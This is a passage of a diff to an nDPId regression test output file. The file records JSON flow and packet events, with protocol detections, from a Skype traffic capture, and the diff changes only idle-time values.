IP"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":477,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970642408,"flow_last_seen":1431970642408,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1431970642408,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00520{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":477,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1431970642408,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1431970642408,"pkt":"\/\/\/\/\/\/\/\/PBXCt3IOCABFAABOkRoAAEARZRPAqAEiwKgB\/wCJAIkAOosFRXIBEAABAAAAAAAAIEFCQUNGUEZQRU5GREVDRkNFUEZIRkRFRkZQRlBBQ0FCAAAgAAE="} 00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":477,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970642408,"flow_last_seen":1431970642408,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1431970642408,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} @@ -226,12 +226,12 @@ 00596{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":597,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970648982,"flow_last_seen":1431970648982,"flow_idle_time":180000,"flow_min_l4_payload_len":502,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":502,"flow_avg_l4_payload_len":502,"midstream":0,"thread_ts_msec":1431970648982,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01128{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":597,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":1,"flow_last_seen":1431970648982,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":544,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":544,"pkt_l4_len":510,"thread_ts_msec":1431970648982,"pkt":"\/\/\/\/\/\/\/\/xCwDBkn+CABFAAISMXYAAEARwrnAqAFcwKgB\/0RcRFwB\/jyueyJob3N0X2ludCI6IDMzNzUzNTk1OTMsICJ2ZXJzaW9uIjogWzEsIDhdLCAiZGlzcGxheW5hbWUiOiAiIiwgInBvcnQiOiAxNzUwMCwgIm5hbWVzcGFjZXMiOiBbMTQ4MTkzMzcsIDE3NjA5OTYzLCAyMDY0OTM0OSwgMjg1MjE2MDcsIDU4MzQ0OTk2LCA2MDU5NDk4MywgNjQ0MzYwOTksIDk2ODUzMjI0LCA5OTQ2OTc3MywgMTAxMDQ3OTk2LCAxMDgxNTkxMDIsIDEyNTU0MDU2NiwgMTc2OTY0MzA3LCAyNDM2ODI5ODYsIDI0NzkyNTA4NSwgMjYwNDY1MjYxLCAyNzA0MDQ3NDIsIDI4Mzg2MTQ1NywgNDI0NTQwMTk3LCA0NDgzOTczOTMsIDQ1MTQ3MjY1OCwgNTExNzA2NjQyLCA1NjgzOTU4MzMsIDU5NDI0Njk1NCwgNTk4MDYxMDY2LCA2MTU5ODMzNzksIDcyMDA1ODM2MSwgNzM1MDUxODMwLCA3MzYzNDE1MjgsIDc0MTI1NTYxMywgNzc2MDg3MjQ3LCA3ODA4NzA1ODEsIDc4Mjk4MTk0OSwgNzg1MjY2MTc3LCA4MTg3NTI3MTAsIDg1NTY4MjM5MCwgODg0MTIwMTMyLCA5MDg5MTQ4NjhdfQ=="} 00656{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":597,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970648982,"flow_last_seen":1431970648982,"flow_idle_time":180000,"flow_min_l4_payload_len":502,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":502,"flow_avg_l4_payload_len":502,"midstream":0,"thread_ts_msec":1431970648982,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} -00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":601,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970649777,"flow_last_seen":1431970649777,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970649777,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.147","src_port":51234,"dst_port":40001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":601,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":1,"flow_last_seen":1431970649777,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970649777,"pkt":"0NQSxnP1PBXCt3IOCABFAABADS1AAEAG4vXAqAEinTfrk8ginEEPp71\/AAAAALAC\/\/+7IQAAAgQFtAEDAwUBAQgKPjHBiQAAAAAEAgAA"} -00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":602,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970649777,"flow_last_seen":1431970649777,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970649777,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.45","src_port":51235,"dst_port":40009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":602,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":1,"flow_last_seen":1431970649777,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970649777,"pkt":"0NQSxnP1PBXCt3IOCABFAABAvnJAAEAGmhbAqAEiQTffLcgjnEma5hywAAAAALAC\/\/85DwAAAgQFtAEDAwUBAQgKPjHBiQAAAAAEAgAA"} -00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":603,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970649777,"flow_last_seen":1431970649777,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970649777,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.45","src_port":51236,"dst_port":40008,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":603,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":1,"flow_last_seen":1431970649777,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970649777,"pkt":"0NQSxnP1PBXCt3IOCABFAABATBhAAEAGcsvAqAEib91KLcgknEjYMAm6AAAAALAC\/\/91FQAAAgQFtAEDAwUBAQgKPjHBiQAAAAAEAgAA"} +00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":601,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970649777,"flow_last_seen":1431970649777,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970649777,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.147","src_port":51234,"dst_port":40001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":601,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":1,"flow_last_seen":1431970649777,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970649777,"pkt":"0NQSxnP1PBXCt3IOCABFAABADS1AAEAG4vXAqAEinTfrk8ginEEPp71\/AAAAALAC\/\/+7IQAAAgQFtAEDAwUBAQgKPjHBiQAAAAAEAgAA"} +00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":602,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970649777,"flow_last_seen":1431970649777,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970649777,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.45","src_port":51235,"dst_port":40009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":602,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":1,"flow_last_seen":1431970649777,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970649777,"pkt":"0NQSxnP1PBXCt3IOCABFAABAvnJAAEAGmhbAqAEiQTffLcgjnEma5hywAAAAALAC\/\/85DwAAAgQFtAEDAwUBAQgKPjHBiQAAAAAEAgAA"} +00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":603,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970649777,"flow_last_seen":1431970649777,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970649777,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.45","src_port":51236,"dst_port":40008,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":603,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":1,"flow_last_seen":1431970649777,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970649777,"pkt":"0NQSxnP1PBXCt3IOCABFAABATBhAAEAGcsvAqAEib91KLcgknEjYMAm6AAAAALAC\/\/91FQAAAgQFtAEDAwUBAQgKPjHBiQAAAAAEAgAA"} 00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":604,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970649777,"flow_last_seen":1431970649777,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431970649777,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.171","src_port":13021,"dst_port":40012,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":604,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":62,"flow_packet_id":1,"flow_last_seen":1431970649777,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":71,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":71,"pkt_l4_len":37,"thread_ts_msec":1431970649777,"pkt":"0NQSxnP1PBXCt3IOCABFAAA5i9YAAEARDTHAqAEinTeCqzLdnEwAJdiNeuEC3c6rdtKsOez6ZXpeJVa7dJ779QK3\/h1JCUU="} 00666{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":604,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970649777,"flow_last_seen":1431970649777,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431970649777,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.171","src_port":13021,"dst_port":40012,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} @@ -247,14 +247,14 @@ 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":608,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970649778,"flow_last_seen":1431970649778,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431970649778,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.25","src_port":13021,"dst_port":40010,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":608,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":66,"flow_packet_id":1,"flow_last_seen":1431970649778,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":1431970649778,"pkt":"0NQSxnP1PBXCt3IOCABFAAA+a34AAEARfBXAqAEinTg0GTLdnEoAKvPOeukCU4Ora98LBiEx3upKt3C\/idNCTbgKHnJdEXlx5pIWdA=="} 00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":608,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970649778,"flow_last_seen":1431970649778,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431970649778,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.25","src_port":13021,"dst_port":40010,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} -00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":620,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":2,"flow_last_seen":1431970649858,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970649858,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADYG+iadN+uTwKgBIpxByCKHTehVD6e9gKASOJCRTQAAAgQFrAQCCApMYEY4PjHBiQEDAwk="} -00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":621,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":3,"flow_last_seen":1431970649858,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970649858,"pkt":"0NQSxnP1PBXCt3IOCABFAAA05xhAAEAGCRbAqAEinTfrk8ginEEPp72Ah03oVoAQECzoKAAAAQEICj4xwdhMYEY4"} -00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":623,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":2,"flow_last_seen":1431970649908,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970649908,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADYGYo1BN98twKgBIpxJyCPPJ6UGmuYcsaASOJBnJAAAAgQFrAQCCApNlOiPPjHBiQEDAwk="} -00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":624,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":3,"flow_last_seen":1431970649908,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970649908,"pkt":"0NQSxnP1PBXCt3IOCABFAAA05LlAAEAGc9vAqAEiQTffLcgjnEma5hyxzyelB4AQECy9zQAAAQEICj4xwgpNlOiP"} -00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":634,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":2,"flow_last_seen":1431970650073,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970650073,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADYGyOdv3UotwKgBIpxIyCR2KHXg2DAJu6ASOJBnsgAAAgQFrAQCCApNh6w6PjHBiQEDAwk="} -00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":635,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":3,"flow_last_seen":1431970650073,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970650073,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0S0FAAEAGc67AqAEib91KLcgknEjYMAm7dih14YAQECy9uQAAAQEICj4xwqxNh6w6"} -00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":644,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970650785,"flow_last_seen":1431970650785,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970650785,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.176","src_port":51237,"dst_port":40022,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":644,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":67,"flow_packet_id":1,"flow_last_seen":1431970650785,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970650785,"pkt":"0NQSxnP1PBXCt3IOCABFAABAQ6lAAEAGFV3AqAEinTeCsMglnFZwrI8vAAAAALAC\/\/\/tTwAAAgQFtAEDAwUBAQgKPjHFcQAAAAAEAgAA"} +00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":620,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":2,"flow_last_seen":1431970649858,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970649858,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADYG+iadN+uTwKgBIpxByCKHTehVD6e9gKASOJCRTQAAAgQFrAQCCApMYEY4PjHBiQEDAwk="} +00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":621,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":3,"flow_last_seen":1431970649858,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970649858,"pkt":"0NQSxnP1PBXCt3IOCABFAAA05xhAAEAGCRbAqAEinTfrk8ginEEPp72Ah03oVoAQECzoKAAAAQEICj4xwdhMYEY4"} +00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":623,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":2,"flow_last_seen":1431970649908,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970649908,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADYGYo1BN98twKgBIpxJyCPPJ6UGmuYcsaASOJBnJAAAAgQFrAQCCApNlOiPPjHBiQEDAwk="} +00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":624,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":3,"flow_last_seen":1431970649908,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970649908,"pkt":"0NQSxnP1PBXCt3IOCABFAAA05LlAAEAGc9vAqAEiQTffLcgjnEma5hyxzyelB4AQECy9zQAAAQEICj4xwgpNlOiP"} +00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":634,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":2,"flow_last_seen":1431970650073,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970650073,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADYGyOdv3UotwKgBIpxIyCR2KHXg2DAJu6ASOJBnsgAAAgQFrAQCCApNh6w6PjHBiQEDAwk="} +00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":635,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":3,"flow_last_seen":1431970650073,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970650073,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0S0FAAEAGc67AqAEib91KLcgknEjYMAm7dih14YAQECy9uQAAAQEICj4xwqxNh6w6"} +00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":644,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970650785,"flow_last_seen":1431970650785,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970650785,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.176","src_port":51237,"dst_port":40022,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":644,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":67,"flow_packet_id":1,"flow_last_seen":1431970650785,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970650785,"pkt":"0NQSxnP1PBXCt3IOCABFAABAQ6lAAEAGFV3AqAEinTeCsMglnFZwrI8vAAAAALAC\/\/\/tTwAAAgQFtAEDAwUBAQgKPjHFcQAAAAAEAgAA"} 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":645,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970650786,"flow_last_seen":1431970650786,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1431970650786,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.28","src_port":13021,"dst_port":40014,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":645,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":68,"flow_packet_id":1,"flow_last_seen":1431970650786,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970650786,"pkt":"0NQSxnP1PBXCt3IOCABFAAA8ax0AAEARLXbAqAEiQTffHDLdnE4AKA\/ueusCO4\/2IMsd1vZVtYtrG4KJHI0MKaf\/zYcpuYfyCTg="} 00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":645,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970650786,"flow_last_seen":1431970650786,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1431970650786,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.28","src_port":13021,"dst_port":40014,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} @@ -270,20 +270,20 @@ 00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":649,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970650786,"flow_last_seen":1431970650786,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431970650786,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.154","src_port":13021,"dst_port":40017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 